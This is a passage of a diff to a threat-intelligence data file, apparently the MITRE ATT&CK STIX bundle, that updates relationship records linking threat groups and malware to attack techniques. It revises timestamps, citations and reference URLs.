"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -85472,7 +86610,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
- "modified": "2019-07-16T15:35:20.968Z",
+ "modified": "2020-06-03T20:22:40.687Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -86557,12 +87695,12 @@
"url": "https://technet.microsoft.com/en-us/library/cc732643.aspx"
}
],
- "source_ref": "tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4"
},
{
"id": "relationship--fcfe071b-e527-44e9-9970-9243a354f563",
@@ -86575,14 +87713,14 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
"target_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529",
"type": "relationship",
- "modified": "2020-03-16T17:37:15.709Z",
+ "modified": "2020-06-29T01:54:53.389Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -86870,12 +88008,12 @@
"url": "https://twitter.com/Evi1cg/status/935027922397573120"
}
],
- "source_ref": "tool--90ec2b22-7061-4469-b539-0989ec4f96c2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "tool--90ec2b22-7061-4469-b539-0989ec4f96c2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e"
},
{
"id": "relationship--39fdd17c-5f59-4daf-bf14-95841b5ec248",
@@ -87053,7 +88191,7 @@
{
"id": "relationship--911c0e63-10bc-4fbd-b7b7-0a9e318bb4f1",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) uses PowerShell for obfuscation and execution.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: ClearSky MuddyWater Nov 2018)",
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) uses PowerShell for obfuscation and execution.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: ClearSky MuddyWater Nov 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -87067,13 +88205,18 @@
"description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
"url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
"source_name": "ClearSky MuddyWater Nov 2018"
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
}
],
"source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
"relationship_type": "uses",
"target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
"type": "relationship",
- "modified": "2019-04-22T22:36:53.081Z",
+ "modified": "2020-05-18T19:37:52.447Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -87205,32 +88348,37 @@
{
"id": "relationship--e35a6a79-0ffc-4835-aaf8-e42dd20a7e45",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Patchwork](https://attack.mitre.org/groups/G0040) has used spearphishing with links to deliver files with exploits to initial victims. The group has used embedded image tags (known as web bugs) with unique, per-recipient tracking links in their emails for the purpose of identifying which recipients opened messages.(Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)",
+ "description": "[Patchwork](https://attack.mitre.org/groups/G0040) has used spearphishing with links to deliver files with exploits to initial victims. The group has also used embedded image tags (known as web bugs) with unique, per-recipient tracking links in their emails for the purpose of identifying which recipients opened messages.(Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)(Citation: Unit 42 BackConfig May 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Symantec Patchwork",
+ "url": "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries",
"description": "Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016.",
- "url": "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries"
+ "source_name": "Symantec Patchwork"
},
{
- "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
+ "source_name": "TrendMicro Patchwork Dec 2017",
"description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.",
- "source_name": "TrendMicro Patchwork Dec 2017"
+ "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
},
{
- "source_name": "Volexity Patchwork June 2018",
+ "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/",
"description": "Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.",
- "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"
+ "source_name": "Volexity Patchwork June 2018"
+ },
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
}
],
"source_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
"relationship_type": "uses",
"target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
"type": "relationship",
- "modified": "2019-07-11T13:53:05.996Z",
+ "modified": "2020-07-03T22:15:24.887Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -87378,12 +88526,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
}
],
- "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c"
},
{
"id": "relationship--9c4a8336-5f5f-4e58-b00d-b6bf1c59ec03",
@@ -87610,14 +88758,14 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
"target_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00",
"type": "relationship",
- "modified": "2020-03-16T17:37:15.712Z",
+ "modified": "2020-06-29T01:54:53.401Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -87629,37 +88777,42 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
"relationship_type": "uses",
"target_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f",
"type": "relationship",
- "modified": "2020-02-18T03:54:11.613Z",
+ "modified": "2020-04-21T23:09:31.600Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
"id": "relationship--f73df541-6b55-42d1-aec3-53660fda1508",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used various batch scripts to establish C2, download additional files, and conduct other functions.(Citation: Palo Alto Gamaredon Feb 2017)",
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used various batch scripts to establish C2 and download additional files. [Gamaredon Group](https://attack.mitre.org/groups/G0047)'s backdoor malware has also been written to a batch file.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: ESET Gamaredon June 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
+ },
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
}
],
"source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
"relationship_type": "uses",
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"type": "relationship",
- "modified": "2019-03-25T12:57:18.676Z",
+ "modified": "2020-06-22T17:54:16.027Z",
"created": "2017-05-31T21:33:27.080Z"
},
{
@@ -87757,14 +88910,14 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
"target_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3",
"type": "relationship",
- "modified": "2020-03-23T16:14:53.767Z",
+ "modified": "2020-06-29T01:54:53.403Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -87819,7 +88972,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -87827,7 +88980,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
"type": "relationship",
- "modified": "2020-03-17T02:15:40.376Z",
+ "modified": "2020-06-22T17:54:16.012Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -87916,22 +89069,27 @@
{
"id": "relationship--1ad674bb-c8e1-4f19-b96e-f56bfa10797c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) used spearphishing emails with malicious Microsoft Word attachments to infect victims.(Citation: Symantec Tick Apr 2016)",
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) used spearphishing emails with malicious Microsoft Word attachments to infect victims.(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan",
+ "source_name": "Symantec Tick Apr 2016",
"description": "DiMaggio, J. (2016, April 28). Tick cyberespionage group zeros in on Japan. Retrieved July 16, 2018.",
- "source_name": "Symantec Tick Apr 2016"
+ "url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
}
],
"source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
"relationship_type": "uses",
"target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
"type": "relationship",
- "modified": "2019-03-22T19:57:37.367Z",
+ "modified": "2020-06-24T01:27:31.906Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -87948,12 +89106,12 @@
"url": "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
}
],
- "source_ref": "malware--b1de6916-7a22-4460-8d26-6b5483ffaa2a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--b1de6916-7a22-4460-8d26-6b5483ffaa2a",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179"
},
{
"id": "relationship--3210e5dd-fd8b-42e6-9933-9c4e0c3bbf6b",
@@ -87964,7 +89122,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -87973,7 +89131,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.262Z",
+ "modified": "2020-04-16T19:41:40.650Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -88600,12 +89758,12 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
}
],
- "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d"
},
{
"id": "relationship--abd0cc1c-8901-4645-8853-c394ae8c573c",
@@ -88684,12 +89842,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa"
},
{
"id": "relationship--ad696f42-0631-43fb-893b-a5616f14f93f",
@@ -88722,7 +89880,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -88730,7 +89888,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c",
"type": "relationship",
- "modified": "2020-03-17T14:47:04.811Z",
+ "modified": "2020-06-22T17:54:16.021Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -88764,7 +89922,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c",
"type": "relationship",
- "modified": "2020-01-22T20:28:29.846Z",
+ "modified": "2020-07-01T18:27:41.884Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -88818,16 +89976,16 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
}
],
"source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-17T00:25:19.480Z",
+ "modified": "2020-06-02T16:14:00.463Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -89145,12 +90303,12 @@
"url": "https://technet.microsoft.com/en-us/library/bb490947.aspx"
}
],
- "source_ref": "tool--4664b683-f578-434f-919b-1c1aad2a1111",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--4664b683-f578-434f-919b-1c1aad2a1111",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475"
},
{
"id": "relationship--f9906a11-8ac7-4bd4-9c28-c58834ff593b",
@@ -89253,18 +90411,23 @@
"description": "The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018."
},
{
- "description": "Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018.",
+ "source_name": "Fortinet Agent Tesla June 2017",
"url": "https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html",
- "source_name": "Fortinet Agent Tesla June 2017"
+ "description": "Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018."
+ },
+ {
+ "source_name": "Bitdefender Agent Tesla April 2020",
+ "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/",
+ "description": "Arsene, L. (2020, April 21). Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can log keystrokes on the victim\u2019s machine.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can log keystrokes on the victim\u2019s machine.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)",
"id": "relationship--891217a4-3822-4345-b77f-448f41fd9361",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"type": "relationship",
- "modified": "2020-03-18T19:25:30.281Z",
+ "modified": "2020-05-20T13:38:07.005Z",
"created": "2019-01-29T18:44:05.133Z"
},
{
@@ -89345,15 +90508,20 @@
"description": "Ray, V. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved November 9, 2018.",
"url": "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/",
"source_name": "Unit 42 Tropic Trooper Nov 2016"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) creates the Registry key HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell and sets the value to establish persistence.(Citation: Unit 42 Tropic Trooper Nov 2016)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has created the Registry key HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell and sets the value to establish persistence.(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)",
"id": "relationship--ad3bca07-c2d2-411f-9bd8-bf4e1142d9ae",
"source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"relationship_type": "uses",
"target_ref": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.212Z",
+ "modified": "2020-05-29T03:23:28.048Z",
"created": "2019-01-29T20:17:49.278Z"
},
{
@@ -89996,7 +91164,7 @@
{
"id": "relationship--3325e625-d76b-42df-b952-749dabb57517",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover active local network connections using the netstat -an, net use, net file, and net session commands.(Citation: Kaspersky Turla) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also enumerated the IPv4 TCP connection table via the GetTcpTable2 API call.(Citation: ESET Turla PowerShell May 2019)",
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover active local network connections using the netstat -an, net use, net file, and net session commands.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also enumerated the IPv4 TCP connection table via the GetTcpTable2 API call.(Citation: ESET Turla PowerShell May 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -90007,16 +91175,21 @@
"source_name": "Kaspersky Turla"
},
{
- "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.",
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "ESET Turla PowerShell May 2019",
"url": "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/",
- "source_name": "ESET Turla PowerShell May 2019"
+ "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019."
}
],
"source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
"relationship_type": "uses",
"target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
"type": "relationship",
- "modified": "2019-07-14T21:04:44.961Z",
+ "modified": "2020-06-29T02:52:31.770Z",
"created": "2017-05-31T21:33:27.045Z"
},
{
@@ -90615,12 +91788,12 @@
"url": "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf"
}
],
- "source_ref": "malware--bd0536d7-b081-43ae-a773-cfb057c5b988",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--bd0536d7-b081-43ae-a773-cfb057c5b988",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -90858,27 +92031,6 @@
"modified": "2020-03-20T16:06:56.321Z",
"created": "2019-01-30T15:47:41.349Z"
},
- {
- "id": "relationship--a381abec-332f-4b93-9585-875561eb52c1",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) has attempted to get users to execute malware via social media and spearphishing emails.(Citation: SecureWorks Mia Ash July 2017)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "source_name": "SecureWorks Mia Ash July 2017",
- "description": "Counter Threat Unit Research Team. (2017, July 27). The Curious Case of Mia Ash: Fake Persona Lures Middle Eastern Targets. Retrieved February 26, 2018.",
- "url": "https://www.secureworks.com/research/the-curious-case-of-mia-ash"
- }
- ],
- "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
- "type": "relationship",
- "modified": "2019-09-09T19:21:42.445Z",
- "created": "2018-04-18T17:59:24.739Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -90958,13 +92110,13 @@
"source_name": "ClearSky MuddyWater Nov 2018"
}
],
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used a custom tool for creating reverse shells.(Citation: Symantec MuddyWater Dec 2018) [MuddyWater](https://attack.mitre.org/groups/G0069) has used JavaScript files to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)[(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)",
